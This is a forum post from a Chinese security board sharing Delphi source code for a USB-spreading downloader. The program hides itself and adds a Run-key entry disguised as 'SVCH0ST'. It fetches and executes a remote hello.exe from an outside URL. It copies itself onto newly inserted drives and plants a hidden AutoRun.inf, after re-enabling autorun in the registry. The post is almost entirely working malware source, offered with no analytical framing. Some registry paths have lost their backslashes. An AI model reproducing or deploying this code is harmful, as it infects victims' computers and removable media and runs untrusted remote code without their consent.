论坛: 菜鸟乐园 标题: U盘传染下载者源代码 复制本贴地址    
作者: Winmillion [winmillion]    论坛用户   登录
interface


uses
  Windows, Messages, SysUtils,Forms,IniFiles;
type
  TFrm_Main = class(TForm)
  procedure FormCreate(Sender: TObject);
  procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
  procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
  { Public declarations }
  end;
const
    exefile = 'SVCH0ST.EXE';
    Buffer = 'http://www.888.com/hello.exe';
    DBT_DEVICEARRIVAL = $8000;  // system detected a new device
    DBT_DEVICEREMOVECOMPLETE = $8004;  // device is gone
    DBT_DEVTYP_VOLUME = $00000002;  // logical volume
    DBTF_MEDIA = $0001;  // media comings and goings
type
PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
TDEV_BROADCAST_HDR = packed record
  dbch_size : DWORD;
  dbch_devicetype : DWORD;
  dbch_reserved : DWORD;
end;
  PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
  TDEV_BROADCAST_VOLUME = packed record
    dbcv_size : DWORD;
    dbcv_devicetype : DWORD;
    dbcv_reserved : DWORD;
    dbcv_unitmask : DWORD;
    dbcv_flags : WORD;
  end;


function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                  StatusCB: Pointer): LongWord;
                  stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
            stdcall; external 'kernel32.dll' name 'WinExec';


var
  Frm_Main: TFrm_Main;
  exefull:string;
implementation


{$R *.dfm}


function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
  result := true;
  RegCloseKey(regkey);
end;


procedure Startup(var TheName:string);
begin
  SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
  UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
  SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
  messagebox(0,'文件下载成功!','成功',MB_OK);
  WinExec(PChar(TheName), SW_SHOWDEFAULT);
  //Sleep(500);
  //DeleteMe;
  //freemem(@path,256);
end;


procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
  lpdb : PDEV_BROADCAST_HDR;
  lpdbv : PDEV_BROADCAST_VOLUME;
  unitmask:DWORD;
  i:integer;
  MyIni:TIniFile;
  s:Hkey;
  value:dword ;
  inifile:string;
begin
  lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
  case Msg.WParam of
  DBT_DEVICEARRIVAL ://有设备安装完毕


  if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
  begin
    lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
    unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符
    for i:=0 to 25 do //遍历磁盘
    begin
      if Boolean(unitmask and $1)then//看该驱动器的状态是否发生了变化
      break;
      unitmask := unitmask shr 1;
    end;
    if fileexists(exefull) then  //向u盘拷文件
    begin
    copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
    FileSetAttr(char(i+65) + ':' + exefile,$00000003);
    end;
    inifile:=char(i+65)+':AutoRun.inf';//ini文件
    RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
    value:=0;
    RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
    RegCloseKey(s);
    if fileexists(inifile) then
    begin
    FileSetAttr(inifile,$00000000);
    DeleteFile(inifile);
    end;
    MyIni := TIniFile.Create(inifile);
    MyIni.WriteString('AutoRun', 'open',exefile);
    FileSetAttr(inifile,$00000003);
  end;
end;
end;


procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
  Application.ShowMainForm:=False;
  getsystemdirectory(path,120);
  exefull := strpas(path) + '' + exefile;
  size:=256;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
  RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
  RegCloseKey(s);
  //文件存在且有自启动
  if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
  messagebox(0,'自启动成功!','成功',MB_OK)
  else
  Startup(exefull);//下载执行函数
end;


procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  Application.Terminate;
end;


end.


地主 发表时间: 09-03-09 21:31

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号